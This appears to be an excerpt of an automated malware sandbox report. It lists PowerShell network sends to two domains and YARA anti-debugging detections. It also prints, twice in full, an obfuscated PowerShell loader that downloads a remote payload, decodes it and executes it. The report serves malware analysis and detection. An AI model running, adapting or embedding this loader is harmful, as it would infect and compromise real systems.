Data sent	sofÑÔÕøæ <,cí.G&dÎûk¸´ù>:/5 ÀÀÀ À 28.ÿtricotexbacau.ro
Data sent	kgfÑÙêßäLõÎó« åî.¯ºP©ªk'wVØ /5 ÀÀÀ À 28&ÿ jahez.me
Data sent	kgfÑÚjö)[d<§Xö2SYÝ9¸LÑÿ¢/5 ÀÀÀ À 28&ÿ jahez.me
Data sent	sofÑÞ,KÔáÿ¹5nL©8^Þ·$iäóé u/5 ÀÀÀ À 28.ÿtricotexbacau.ro
Data sent	sofÑßBÌË½] ^Ð£ë`¤9àaÿº/5 ÀÀÀ À 28.ÿtricotexbacau.ro
Data sent	kgfÑäåã.D¥vÊ\|^ÞZPÏcm£2Nï/5 ÀÀÀ À 28&ÿ jahez.me
Data sent	kgfÑäã#m<,äK¸l2«³!òIL_óMÁ )º/5 ÀÀÀ À 28&ÿ jahez.me
Data sent	sofÑé6hãdlØí#ÌjqðYàRãwÃ§*/5 ÀÀÀ À 28.ÿtricotexbacau.ro
Data sent	sofÑé&©b²ÎlÎeªÌìfÏ9/5 ÀÀÀ À 28.ÿtricotexbacau.ro
Data sent	kgfÑî`Y«ôklø^<äzïp3=¤x¬gR;¾^I/5 ÀÀÀ À 28&ÿ jahez.me
Data sent	kgfÑï&Þ~=ÍGfHÖ¨<Æ;$¢ªª²¨0+lØú/5 ÀÀÀ À 28&ÿ jahez.me
Data sent	sofÑóÌ' ÍàcÚí ýEùÙYmêw3¼/5 ÀÀÀ À 28.ÿtricotexbacau.ro
Data sent	sofÑôû5ÙÒªQª=[naBZ@SèË ©#-Ð/5 ÀÀÀ À 28.ÿtricotexbacau.ro
Data sent	kgfÑøã'äÿ,C=^fËel&µê ',K/5 ÀÀÀ À 28&ÿ jahez.me
Data sent	kgfÑù&VIúû#©!^òYÅf>È?";B\/5 ÀÀÀ À 28&ÿ jahez.me
Data sent	sofÑþYÇâ×ÓSPt¸ÅqÅ<ßèg¦ãì`¿Û/5 ÀÀÀ À 28.ÿtricotexbacau.ro
Data sent	sofÑþýð?eÐþg{¥#»ÎöO^´ oai¡Á þ9/5 ÀÀÀ À 28.ÿtricotexbacau.ro
Data sent	kgfÑº>ºÂk6~{z%+ Ñ]ílú\|0/5 ÀÀÀ À 28&ÿ jahez.me
Data sent	kgfÑ,Spx,X¤A[©ËÙWV@möv¬¹1/5 ÀÀÀ À 28&ÿ jahez.me
Data sent	sofÑvåB7xðdkQFM1TèÁãUPæ/5 ÀÀÀ À 28.ÿtricotexbacau.ro
Data sent	sofÑ¦à8#O"ìP¶r,hn(¢ÝoaÀoXñY/5 ÀÀÀ À 28.ÿtricotexbacau.ro
Data sent	kgfÑ zbù§9&ª¼ëÅÜ+jÖÇÃûcË/5 ÀÀÀ À 28&ÿ jahez.me
Data sent	kgfÑ@EÛ±iDd®ÑoYU²t¸\d56BÕ®{/5 ÀÀÀ À 28&ÿ jahez.me
Data sent	sofÑÞÌ.X,N\Lò»µûvhÞ÷åyÀ¥~1/5 ÀÀÀ À 28.ÿtricotexbacau.ro
Data sent	sofÑI Å[O°xe¥ÕnÎ´4úw»1/5 ÀÀÀ À 28.ÿtricotexbacau.ro
Data sent	kgfÑ¯Cònó±ÀÆ¯LÇ°ÜRrÕ¨z0·¼Á{p/5 ÀÀÀ À 28&ÿ jahez.me
Data sent	kgfÑ2I1û&~uòf¢Íªa Ïú¿ °ÀZÜ/5 ÀÀÀ À 28&ÿ jahez.me
Data sent	sofÑjë-yýÀzEð×s?þ´»>eædü;ª/5 ÀÀÀ À 28.ÿtricotexbacau.ro
Data sent	sofÑÁ×¿ý-Ay<DáÚÙqï¹§ÊëÞü½.5/5 ÀÀÀ À 28.ÿtricotexbacau.ro
Data sent	kgfÑ"o¸Àµ¢K<ÚâPwÔ]ÒtÆ'_Â/5 ÀÀÀ À 28&ÿ jahez.me
Data sent	kgfÑ#«ÐK >Ûû£¡ëßª6*á'-R¸NN/5 ÀÀÀ À 28&ÿ jahez.me
Data sent	sofÑ'gL&´ÝiohÆÖþ(7F\-Å!Ò/5 ÀÀÀ À 28.ÿtricotexbacau.ro
Data sent	sofÑ(<ù(¥×À´= Ô%ûû(Tq¦äÛ¢/5 ÀÀÀ À 28.ÿtricotexbacau.ro
Data sent	kgfÑ,Kú@ È§zÊÇª=#ÇÍþXq? ÿ/5 ÀÀÀ À 28&ÿ jahez.me

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Aug. 30, 2024, 6:07 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (8 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (2 events)

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Standardfradrags='SUBsTR';$Distriktslgernes157++;}$Standardfradrags+='ing';Function Bandolojrer($Fjordene){$Dizz=$Fjordene.Length-$Distriktslgernes157;For( $Udrringen=4;$Udrringen -lt $Dizz;$Udrringen+=5){$Reflexologically+=$Fjordene.$Standardfradrags.'Invoke'( $Udrringen, $Distriktslgernes157);}$Reflexologically;}function Bardling($Udrringennoppugnable){ & ($Anacoluthon) ($Udrringennoppugnable);}$Whished=Bandolojrer 'ProvMEbe.oKrysz,erviSnekl undlLykkaServ/ Svi5 Lam. Vo.0Al,o Nat(R ffW ,mfitrann .erdHo doSilvwWe gsPhyl DrumN BesT A.p A,be1Ant,0Unse. Und0Lear;Bogd ProgWPizziRejnnOve.6Pala4 Non;T.ls Drvox.rdi6Korr4Inte; Uni BendrGammv Sk :Tan,1Csiu2 C.o1 Hel.Par.0 Per)Side Pro.G SyneTachcrevekRibboBort/ An 2Ulse0Slag1Sika0unex0 Bib1 Fla0In,e1Ops. TriFKv.riWorsrKonge Pref ieno MurxR fu/Bavn1Axel2Sui 1Zard.Form0magt ';$Bgehjes=Bandolojrer 'hertUannesKerfeUnasrI.va-AuxoABra gFreeeAutonFrertG ov ';$Tipstaves=Bandolojrer ' ,oph BantSoutt NedpConcsWich:Gala/ tu /Cytot.kilrEnani Undc.nvioCotttEndeeRevexNo,abSensaCo ecSpruaAna,u Rev.E emr Pluoterg/ ovewVa,cp.ria-UndeiPa on Ly,cRaadlDehyu.oerdExtee R,asCret/Enhei eqmAchrgSode/CockN O eoBaden.obbd misiInatsvi tcP.efoTy,inRegrt opni AuknstaduSilvaGraanDemocWindetail.FilmmBry,iSarcxStra>Fo.dhMetatPleatTakkpCrims Bej: Ta./Expa/ s,bjEeteaBandhHouse espz f e.KunsmrenteUlno/De tfUn,hoSwinnSymptRefo/HypoN H,soUdlenAfmad PyriIntes,ntacFul oUdvan ithtLysaiH,lmnSe vuShaaaIndtn ReucMo ie Phr.GranmApari O exPisc ';$Plumaceous=Bandolojrer 'Conf> Com ';$Anacoluthon=Bandolojrer ',agfiArkaeKu.sxacqu ';$Dichlorohydrin='Chalon';$Baalets = Bandolojrer 'Anvae Medc KulhStatoIndb I d%ShanaK,rnpPuddpp.std,yveaUnest,rdia Di,%.lay\FortF TabrKno,iH,rksTax tbuldaDeledTyn.ecalvnUnmesTrsk.quotTPr diMyndlMisd .rok&Grov&Ho t AlgoeAf ycSulphMineoAtti ,oolt Hem ';Bardling (Bandolojrer 'Nuan$Gra.gTu il andobespbBedwa Do.lUn a:MultPPse.l UdtaluddsMislt,tahi St cUns.aFimbl aclFe dyO de=Grun(Ti tc.antm irddent N z/natic Sty Tin$TilbB Afba Ro,aCryblTeeteprobtKn.fs Lou) Pen ');Bardling (Bandolojrer 'Vent$Se rgMargl ,avoKetcb,ejlaPantlBind: ettU lad UndeBa lb VelastatnL,edeWindr Sufsarth=Ant $D.etTbrieiUdslpG,nosslumtStttaFairv blae.ndrs,ver.AdensSip.p adelTypoiGr.et Bl,(Phal$ owPBrnel B nuG atmUnhaaSnigcarbeeUnhuoUn uuAd,asSpa ) ,al ');Bardling (Bandolojrer 'S,er[GodtN ThyeVer.tOutp. Ko.SStyreJulerskogv LeniovercdesieEur PSup oIndeiPontnAfdatglanMLongaDonknDruiaRubbg,enheSonnr rl] Mis:Okku:,rchSLan.eKoorcTootuSegurBombiSteit LakyBetnPSignr CraoantitKundo WilcSp.uoNonrlle,e Tryk= Den The.[RegiNMarmebas.t Ben. HidS smeSuggcR,nguF.rsr Pr.iRecotStudyFl vPBallrPrero PretKnysoPythc,aktoTeksl merTOveryLourpdobbeSki ]Da e: Sko: tyvTPhotlA,ilsP an1Quot2 ple ');$Tipstaves=$Udebaners[0];$Overfladetemperatur= (Bandolojrer 'Unal$ AmpgC,ealCi foBiblb empaPatelWeav:TjurHCentaT rel Co,lInflmOveraYderr ardkM.rt=,tepNPulaeWeapwTypi-Fr,dO ,gnb erijski,eA.rec rektAn,b PistSFro yNorms OvetInveeTchamSmld.DeleNunmieHilltcloi. ,ieWly feTa,eb be,CUncol MasiGas.eBenznSk et');$Overfladetemperatur+=$Plastically[1];Bardling ($Overfladetemperatur);Bardling (Bandolojrer 'Pek $klitHMoelaG nel,ubdlKom,mMiljaPokarOxysk urm.AfteHOpiuevi.taTangdAutoeCr nr ScasSy.k[Plas$Sk,iBM,thgFljte OtohTedejBi.deAfrisAgte]Ul k=,nde$ FicWAdrehVitri M,ssSlukhT,ljeBoomdImpe ');$kongelovens=Bandolojrer 'Kont$CentHdokua,hecl .trlSoakmSlikaD,slr Ichk Kli.enneDCe eoTr.ywWie,nMarslFi,ko Ma,aOppodNyheF A giSejllMesoeF,lm(D,ne$SkolTV,ndiProvpT.ylsteest TabaOvervcafeeGiftsNavn,Arab$PapiY ud oInfou FlatGelahTildeHvornFremiUndenHas.gMilj) Geo ';$Youthening=$Plastically[0];Bardling (Bandolojrer 'Rund$ Ad.gNipplMiseoUnd,bvenuaDecilChai:SwamSIn,ieUr.cm,ndeu SollTriajSp.meVaabg BesrDunay.algnSlage Uset halsRack=Ski (outpTFeriePhylsT betUnde-GydePKresaMus,tSynkhEi s For$DisiY A.ao.rmmu AnttsparhGue.eWomanMegaiValsnFra,g Ban)Gaar ');while (!$Semuljegrynets) {Bardling (Bandolojrer 'E,to$NonegAl alKlagoFantbBegna TotlCour:Mun,KPlacaosmutFo ueOve,dEnf rDumpa S.pl Fi.eWaitrTanksSamt=Coke$SupptHva rToddu Ka,eUpaa ') ;Bardling $kongelovens;Bardling (Bandolojrer 'sad,S H.ptCangaKr erFa mtUrs.-Eva STen lWalleChokeLdetpSal. O.er4 .ag ');Bardling (Bandolojrer 'Type$,ndhg Basl HovoMentbRej,aHofmlEduc: ProSvel.eLogom Creu H nl E,gjCi,ree hegDoupr,agsyFsfinAradeBygntAnassTow,= Xyl(UndeT,usme BansFiret Fel-BanaPHst a.rstt verh Thy Mus$B,lgY ,nhoSpiruIndhtI anhW,deeA,isnDecai A snFiengEssa)Supe ') ;Bardling (Bandolojrer 'Unt,$isedgT.dil,awmoIndibovera CyclProd:pe,fSMetat,muto,ydsp ,aif DupoWormdAkt.rI,teeU.udrUnde=Reno$BidsgJinsl Cado BoibGrima ,axlNiss:GromN Toto,ridnElumkbunknDelso Rivw.apalUnspeKik.dCan g .aveAn n+Meta+ Sig%Prec$BillUTr.ndHundeAlbabkam a AnknUntreNo.orSpejs Ast. ShacSatsoGarguTraunFilttma k ') ;$Tipstaves=$Udebaners[$Stopfodrer];}$Plenitude=315632;$Afprvningsprocedurerne=28053;Bardling (Bandolojrer 'Sats$Bor gMovilNib oUn bb ewsaKurtlprot:EtvrPOnflaHovedUndidVoodoevenc GerkForesPreltAnicoz,xno MrklUran2,nst4B,nv9Mot. .ekt= Min FraGDesse,rbet,uri-Udb,C R lo Sunn Endt rodeAbeanK,yetEvne V,p$ daYKebboB ffuQuartDenthFor.eDullnP ntiAbolnLeksgEave ');Bardling (Bandolojrer ' .je$anthgAno l hoto Ar.bEl,saSherlSemi:DataSSkibhHum,a L.nn M,tgFas,a jelFri l ,jeaDefl5 nde1 esa Sciu= Tra Lap.[MackS Fory.ulmsKya,tAireeVan,mPom . WooCNe.ro.hetnProvvInsueAplarV,nstMani] Lon:b om:WateF,einr OrdoFarvmrollBSemiaFirnsCan,e Cac6Af,e4,uleSAlpetSubjr.atai UndnLonng si,(Blod$ForuPFabeaDemadPaa,d WaioBekocDamakU cos .yntUd,uoGid oco plStep2 alt4ra l9Cata)dian ');Bardling (Bandolojrer ' Dia$benegReasl Nono Scib .ftaAffelel,v:AccoPDaarrGeneeGenniCal nH,pssCobwuHydrlSatiaOverrReca Seri=Len. ,ont[AttaSavisyKlagsb attChewe Talm .ra.TndeT R,geUsoix Ma,tStem. utsEJuarn TilcS oroElitdSpiliTalsnFi egDrui]Win :Nonr:Bra.AWhirSHellCMoroI DesI Sam.ExodGtidseRedit HanSIngetC.eprMaali.ensn UndgLew (Avis$ FreSA.cohUmboaU vinSteggChonaSpirl AlblK,mmapenn5Jobb1Spic)Outs ');Bardling (Bandolojrer 'le,l$ ,iggDelilKegsoRattbDemia .arl ic:,olkP orsr Bi oPartfTilbu Syrs MaiiNumioSk pnGen,=Pall$aarsP armrEpiteOveriKo tnBetasExocu upelLuncaInderSprn.AvulsTr nu LanbOversPrintArbernegli.yrenAng gEnte(Hjem$HittPPontlPubleBan.nMopsiHistt TaluForfdSchieUfor,Pers$gaveATitafStbepStifr sp,vold,n ZoniHuthn.gtegUerhsHa npSt dr c coParacPenteSkovd kvau Kilr.orseLattrP.elnEnraeDo,b).elt ');Bardling $Profusion;"

cmdline

POWERSHELL "If (${host}.CurrentUICulture) {$Standardfradrags='SUBsTR';$Distriktslgernes157++;}$Standardfradrags+='ing';Function Bandolojrer($Fjordene){$Dizz=$Fjordene.Length-$Distriktslgernes157;For( $Udrringen=4;$Udrringen -lt $Dizz;$Udrringen+=5){$Reflexologically+=$Fjordene.$Standardfradrags.'Invoke'( $Udrringen, $Distriktslgernes157);}$Reflexologically;}function Bardling($Udrringennoppugnable){ & ($Anacoluthon) ($Udrringennoppugnable);}$Whished=Bandolojrer 'ProvMEbe.oKrysz,erviSnekl undlLykkaServ/ Svi5 Lam. Vo.0Al,o Nat(R ffW ,mfitrann .erdHo doSilvwWe gsPhyl DrumN BesT A.p A,be1Ant,0Unse. Und0Lear;Bogd ProgWPizziRejnnOve.6Pala4 Non;T.ls Drvox.rdi6Korr4Inte; Uni BendrGammv Sk :Tan,1Csiu2 C.o1 Hel.Par.0 Per)Side Pro.G SyneTachcrevekRibboBort/ An 2Ulse0Slag1Sika0unex0 Bib1 Fla0In,e1Ops. TriFKv.riWorsrKonge Pref ieno MurxR fu/Bavn1Axel2Sui 1Zard.Form0magt ';$Bgehjes=Bandolojrer 'hertUannesKerfeUnasrI.va-AuxoABra gFreeeAutonFrertG ov ';$Tipstaves=Bandolojrer ' ,oph BantSoutt NedpConcsWich:Gala/ tu /Cytot.kilrEnani Undc.nvioCotttEndeeRevexNo,abSensaCo ecSpruaAna,u Rev.E emr Pluoterg/ ovewVa,cp.ria-UndeiPa on Ly,cRaadlDehyu.oerdExtee R,asCret/Enhei eqmAchrgSode/CockN O eoBaden.obbd misiInatsvi tcP.efoTy,inRegrt opni AuknstaduSilvaGraanDemocWindetail.FilmmBry,iSarcxStra>Fo.dhMetatPleatTakkpCrims Bej: Ta./Expa/ s,bjEeteaBandhHouse espz f e.KunsmrenteUlno/De tfUn,hoSwinnSymptRefo/HypoN H,soUdlenAfmad PyriIntes,ntacFul oUdvan ithtLysaiH,lmnSe vuShaaaIndtn ReucMo ie Phr.GranmApari O exPisc ';$Plumaceous=Bandolojrer 'Conf> Com ';$Anacoluthon=Bandolojrer ',agfiArkaeKu.sxacqu ';$Dichlorohydrin='Chalon';$Baalets = Bandolojrer 'Anvae Medc KulhStatoIndb I d%ShanaK,rnpPuddpp.std,yveaUnest,rdia Di,%.lay\FortF TabrKno,iH,rksTax tbuldaDeledTyn.ecalvnUnmesTrsk.quotTPr diMyndlMisd .rok&Grov&Ho t AlgoeAf ycSulphMineoAtti ,oolt Hem ';Bardling (Bandolojrer 'Nuan$Gra.gTu il andobespbBedwa Do.lUn a:MultPPse.l UdtaluddsMislt,tahi St cUns.aFimbl aclFe dyO de=Grun(Ti tc.antm irddent N z/natic Sty Tin$TilbB Afba Ro,aCryblTeeteprobtKn.fs Lou) Pen ');Bardling (Bandolojrer 'Vent$Se rgMargl ,avoKetcb,ejlaPantlBind: ettU lad UndeBa lb VelastatnL,edeWindr Sufsarth=Ant $D.etTbrieiUdslpG,nosslumtStttaFairv blae.ndrs,ver.AdensSip.p adelTypoiGr.et Bl,(Phal$ owPBrnel B nuG atmUnhaaSnigcarbeeUnhuoUn uuAd,asSpa ) ,al ');Bardling (Bandolojrer 'S,er[GodtN ThyeVer.tOutp. Ko.SStyreJulerskogv LeniovercdesieEur PSup oIndeiPontnAfdatglanMLongaDonknDruiaRubbg,enheSonnr rl] Mis:Okku:,rchSLan.eKoorcTootuSegurBombiSteit LakyBetnPSignr CraoantitKundo WilcSp.uoNonrlle,e Tryk= Den The.[RegiNMarmebas.t Ben. HidS smeSuggcR,nguF.rsr Pr.iRecotStudyFl vPBallrPrero PretKnysoPythc,aktoTeksl merTOveryLourpdobbeSki ]Da e: Sko: tyvTPhotlA,ilsP an1Quot2 ple ');$Tipstaves=$Udebaners[0];$Overfladetemperatur= (Bandolojrer 'Unal$ AmpgC,ealCi foBiblb empaPatelWeav:TjurHCentaT rel Co,lInflmOveraYderr ardkM.rt=,tepNPulaeWeapwTypi-Fr,dO ,gnb erijski,eA.rec rektAn,b PistSFro yNorms OvetInveeTchamSmld.DeleNunmieHilltcloi. ,ieWly feTa,eb be,CUncol MasiGas.eBenznSk et');$Overfladetemperatur+=$Plastically[1];Bardling ($Overfladetemperatur);Bardling (Bandolojrer 'Pek $klitHMoelaG nel,ubdlKom,mMiljaPokarOxysk urm.AfteHOpiuevi.taTangdAutoeCr nr ScasSy.k[Plas$Sk,iBM,thgFljte OtohTedejBi.deAfrisAgte]Ul k=,nde$ FicWAdrehVitri M,ssSlukhT,ljeBoomdImpe ');$kongelovens=Bandolojrer 'Kont$CentHdokua,hecl .trlSoakmSlikaD,slr Ichk Kli.enneDCe eoTr.ywWie,nMarslFi,ko Ma,aOppodNyheF A giSejllMesoeF,lm(D,ne$SkolTV,ndiProvpT.ylsteest TabaOvervcafeeGiftsNavn,Arab$PapiY ud oInfou FlatGelahTildeHvornFremiUndenHas.gMilj) Geo ';$Youthening=$Plastically[0];Bardling (Bandolojrer 'Rund$ Ad.gNipplMiseoUnd,bvenuaDecilChai:SwamSIn,ieUr.cm,ndeu SollTriajSp.meVaabg BesrDunay.algnSlage Uset halsRack=Ski (outpTFeriePhylsT betUnde-GydePKresaMus,tSynkhEi s For$DisiY A.ao.rmmu AnttsparhGue.eWomanMegaiValsnFra,g Ban)Gaar ');while (!$Semuljegrynets) {Bardling (Bandolojrer 'E,to$NonegAl alKlagoFantbBegna TotlCour:Mun,KPlacaosmutFo ueOve,dEnf rDumpa S.pl Fi.eWaitrTanksSamt=Coke$SupptHva rToddu Ka,eUpaa ') ;Bardling $kongelovens;Bardling (Bandolojrer 'sad,S H.ptCangaKr erFa mtUrs.-Eva STen lWalleChokeLdetpSal. O.er4 .ag ');Bardling (Bandolojrer 'Type$,ndhg Basl HovoMentbRej,aHofmlEduc: ProSvel.eLogom Creu H nl E,gjCi,ree hegDoupr,agsyFsfinAradeBygntAnassTow,= Xyl(UndeT,usme BansFiret Fel-BanaPHst a.rstt verh Thy Mus$B,lgY ,nhoSpiruIndhtI anhW,deeA,isnDecai A snFiengEssa)Supe ') ;Bardling (Bandolojrer 'Unt,$isedgT.dil,awmoIndibovera CyclProd:pe,fSMetat,muto,ydsp ,aif DupoWormdAkt.rI,teeU.udrUnde=Reno$BidsgJinsl Cado BoibGrima ,axlNiss:GromN Toto,ridnElumkbunknDelso Rivw.apalUnspeKik.dCan g .aveAn n+Meta+ Sig%Prec$BillUTr.ndHundeAlbabkam a AnknUntreNo.orSpejs Ast. ShacSatsoGarguTraunFilttma k ') ;$Tipstaves=$Udebaners[$Stopfodrer];}$Plenitude=315632;$Afprvningsprocedurerne=28053;Bardling (Bandolojrer 'Sats$Bor gMovilNib oUn bb ewsaKurtlprot:EtvrPOnflaHovedUndidVoodoevenc GerkForesPreltAnicoz,xno MrklUran2,nst4B,nv9Mot. .ekt= Min FraGDesse,rbet,uri-Udb,C R lo Sunn Endt rodeAbeanK,yetEvne V,p$ daYKebboB ffuQuartDenthFor.eDullnP ntiAbolnLeksgEave ');Bardling (Bandolojrer ' .je$anthgAno l hoto Ar.bEl,saSherlSemi:DataSSkibhHum,a L.nn M,tgFas,a jelFri l ,jeaDefl5 nde1 esa Sciu= Tra Lap.[MackS Fory.ulmsKya,tAireeVan,mPom . WooCNe.ro.hetnProvvInsueAplarV,nstMani] Lon:b om:WateF,einr OrdoFarvmrollBSemiaFirnsCan,e Cac6Af,e4,uleSAlpetSubjr.atai UndnLonng si,(Blod$ForuPFabeaDemadPaa,d WaioBekocDamakU cos .yntUd,uoGid oco plStep2 alt4ra l9Cata)dian ');Bardling (Bandolojrer ' Dia$benegReasl Nono Scib .ftaAffelel,v:AccoPDaarrGeneeGenniCal nH,pssCobwuHydrlSatiaOverrReca Seri=Len. ,ont[AttaSavisyKlagsb attChewe Talm .ra.TndeT R,geUsoix Ma,tStem. utsEJuarn TilcS oroElitdSpiliTalsnFi egDrui]Win :Nonr:Bra.AWhirSHellCMoroI DesI Sam.ExodGtidseRedit HanSIngetC.eprMaali.ensn UndgLew (Avis$ FreSA.cohUmboaU vinSteggChonaSpirl AlblK,mmapenn5Jobb1Spic)Outs ');Bardling (Bandolojrer 'le,l$ ,iggDelilKegsoRattbDemia .arl ic:,olkP orsr Bi oPartfTilbu Syrs MaiiNumioSk pnGen,=Pall$aarsP armrEpiteOveriKo tnBetasExocu upelLuncaInderSprn.AvulsTr nu LanbOversPrintArbernegli.yrenAng gEnte(Hjem$HittPPontlPubleBan.nMopsiHistt TaluForfdSchieUfor,Pers$gaveATitafStbepStifr sp,vold,n ZoniHuthn.gtegUerhsHa npSt dr c coParacPenteSkovd kvau Kilr.orseLattrP.elnEnraeDo,b).elt ');Bardling $Profusion;"

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (41 events)

Time & API	Arguments	Status	Return
send Aug. 30, 2024, 6:07 p.m.	buffer: sofÑÄaWÅCs8ÕÑYó ¶&$ØA'ú±¡/5 ÀÀÀ À 28.ÿtricotexbacau.ro socket: 1324 sent: 120	1	120
send Aug. 30, 2024, 6:07 p.m.	buffer: sofÑÅ+cÞ¸AW:¸VV\|ïË:WF ëþ>qCñ/5 ÀÀÀ À 28.ÿtricotexbacau.ro socket: 1324 sent: 120	1	120
send Aug. 30, 2024, 6:07 p.m.	buffer: sofÑÉ¨ëÅþÞkxÁüII;Âî\æóa¿u ÷/5 ÀÀÀ À 28.ÿtricotexbacau.ro socket: 1324 sent: 120	1	120
send Aug. 30, 2024, 6:07 p.m.	buffer: sofÑÊ»&úÒïúØLå¦·fðc°7"àå/5 ÀÀÀ À 28.ÿtricotexbacau.ro socket: 1324 sent: 120	1	120
send Aug. 30, 2024, 6:07 p.m.	buffer: kgfÑÏB ±ÀÓ´æFr&¢öLËÕy2âNù/5 ÀÀÀ À 28&ÿ jahez.me socket: 1324 sent: 112	1	112
send Aug. 30, 2024, 6:07 p.m.	buffer: kgfÑÏ¼4¼CÓle!6HND "æ0xìwç#/5 ÀÀÀ À 28&ÿ jahez.me socket: 1324 sent: 112	1	112
send Aug. 30, 2024, 6:07 p.m.	buffer: sofÑÔÓd*´^PüâØñ[K ¬Ëã¾/5 ÀÀÀ À 28.ÿtricotexbacau.ro socket: 1324 sent: 120	1	120
send Aug. 30, 2024, 6:07 p.m.	buffer: sofÑÔÕøæ <,cí.G&dÎûk¸´ù>:/5 ÀÀÀ À 28.ÿtricotexbacau.ro socket: 1324 sent: 120	1	120
send Aug. 30, 2024, 6:07 p.m.	buffer: kgfÑÙêßäLõÎó« åî.¯ºP©ªk'wVØ /5 ÀÀÀ À 28&ÿ jahez.me socket: 1248 sent: 112	1	112
send Aug. 30, 2024, 6:07 p.m.	buffer: kgfÑÚjö)[d<§Xö2SYÝ9¸LÑÿ¢/5 ÀÀÀ À 28&ÿ jahez.me socket: 1248 sent: 112	1	112
send Aug. 30, 2024, 6:07 p.m.	buffer: sofÑÞ,KÔáÿ¹5nL©8^Þ·$iäóé u/5 ÀÀÀ À 28.ÿtricotexbacau.ro socket: 1248 sent: 120	1	120
send Aug. 30, 2024, 6:07 p.m.	buffer: sofÑßBÌË½] ^Ð£ë`¤9àaÿº/5 ÀÀÀ À 28.ÿtricotexbacau.ro socket: 1248 sent: 120	1	120
send Aug. 30, 2024, 6:07 p.m.	buffer: kgfÑäåã.D¥vÊ\|^ÞZPÏcm£2Nï/5 ÀÀÀ À 28&ÿ jahez.me socket: 488 sent: 112	1	112
send Aug. 30, 2024, 6:07 p.m.	buffer: kgfÑäã#m<,äK¸l2«³!òIL_óMÁ )º/5 ÀÀÀ À 28&ÿ jahez.me socket: 488 sent: 112	1	112
send Aug. 30, 2024, 6:07 p.m.	buffer: sofÑé6hãdlØí#ÌjqðYàRãwÃ§*/5 ÀÀÀ À 28.ÿtricotexbacau.ro socket: 488 sent: 120	1	120
send Aug. 30, 2024, 6:07 p.m.	buffer: sofÑé&©b²ÎlÎeªÌìfÏ9/5 ÀÀÀ À 28.ÿtricotexbacau.ro socket: 488 sent: 120	1	120
send Aug. 30, 2024, 6:07 p.m.	buffer: kgfÑî`Y«ôklø^<äzïp3=¤x¬gR;¾^I/5 ÀÀÀ À 28&ÿ jahez.me socket: 488 sent: 112	1	112
send Aug. 30, 2024, 6:07 p.m.	buffer: kgfÑï&Þ~=ÍGfHÖ¨<Æ;$¢ªª²¨0+lØú/5 ÀÀÀ À 28&ÿ jahez.me socket: 488 sent: 112	1	112
send Aug. 30, 2024, 6:08 p.m.	buffer: sofÑóÌ' ÍàcÚí ýEùÙYmêw3¼/5 ÀÀÀ À 28.ÿtricotexbacau.ro socket: 488 sent: 120	1	120
send Aug. 30, 2024, 6:08 p.m.	buffer: sofÑôû5ÙÒªQª=[naBZ@SèË ©#-Ð/5 ÀÀÀ À 28.ÿtricotexbacau.ro socket: 488 sent: 120	1	120
send Aug. 30, 2024, 6:08 p.m.	buffer: kgfÑøã'äÿ,C=^fËel&µê ',K/5 ÀÀÀ À 28&ÿ jahez.me socket: 488 sent: 112	1	112
send Aug. 30, 2024, 6:08 p.m.	buffer: kgfÑù&VIúû#©!^òYÅf>È?";B\/5 ÀÀÀ À 28&ÿ jahez.me socket: 488 sent: 112	1	112
send Aug. 30, 2024, 6:08 p.m.	buffer: sofÑþYÇâ×ÓSPt¸ÅqÅ<ßèg¦ãì`¿Û/5 ÀÀÀ À 28.ÿtricotexbacau.ro socket: 488 sent: 120	1	120
send Aug. 30, 2024, 6:08 p.m.	buffer: sofÑþýð?eÐþg{¥#»ÎöO^´ oai¡Á þ9/5 ÀÀÀ À 28.ÿtricotexbacau.ro socket: 488 sent: 120	1	120
send Aug. 30, 2024, 6:08 p.m.	buffer: kgfÑº>ºÂk6~{z%+ Ñ]ílú\|0/5 ÀÀÀ À 28&ÿ jahez.me socket: 488 sent: 112	1	112
send Aug. 30, 2024, 6:08 p.m.	buffer: kgfÑ,Spx,X¤A[©ËÙWV@möv¬¹1/5 ÀÀÀ À 28&ÿ jahez.me socket: 488 sent: 112	1	112
send Aug. 30, 2024, 6:08 p.m.	buffer: sofÑvåB7xðdkQFM1TèÁãUPæ/5 ÀÀÀ À 28.ÿtricotexbacau.ro socket: 1212 sent: 120	1	120
send Aug. 30, 2024, 6:08 p.m.	buffer: sofÑ¦à8#O"ìP¶r,hn(¢ÝoaÀoXñY/5 ÀÀÀ À 28.ÿtricotexbacau.ro socket: 1212 sent: 120	1	120
send Aug. 30, 2024, 6:08 p.m.	buffer: kgfÑ zbù§9&ª¼ëÅÜ+jÖÇÃûcË/5 ÀÀÀ À 28&ÿ jahez.me socket: 1212 sent: 112	1	112
send Aug. 30, 2024, 6:08 p.m.	buffer: kgfÑ@EÛ±iDd®ÑoYU²t¸\d56BÕ®{/5 ÀÀÀ À 28&ÿ jahez.me socket: 1212 sent: 112	1	112
send Aug. 30, 2024, 6:08 p.m.	buffer: sofÑÞÌ.X,N\Lò»µûvhÞ÷åyÀ¥~1/5 ÀÀÀ À 28.ÿtricotexbacau.ro socket: 1212 sent: 120	1	120
send Aug. 30, 2024, 6:08 p.m.	buffer: sofÑI Å[O°xe¥ÕnÎ´4úw»1/5 ÀÀÀ À 28.ÿtricotexbacau.ro socket: 1212 sent: 120	1	120
send Aug. 30, 2024, 6:08 p.m.	buffer: kgfÑ¯Cònó±ÀÆ¯LÇ°ÜRrÕ¨z0·¼Á{p/5 ÀÀÀ À 28&ÿ jahez.me socket: 1212 sent: 112	1	112
send Aug. 30, 2024, 6:08 p.m.	buffer: kgfÑ2I1û&~uòf¢Íªa Ïú¿ °ÀZÜ/5 ÀÀÀ À 28&ÿ jahez.me socket: 1212 sent: 112	1	112
send Aug. 30, 2024, 6:08 p.m.	buffer: sofÑjë-yýÀzEð×s?þ´»>eædü;ª/5 ÀÀÀ À 28.ÿtricotexbacau.ro socket: 1332 sent: 120	1	120
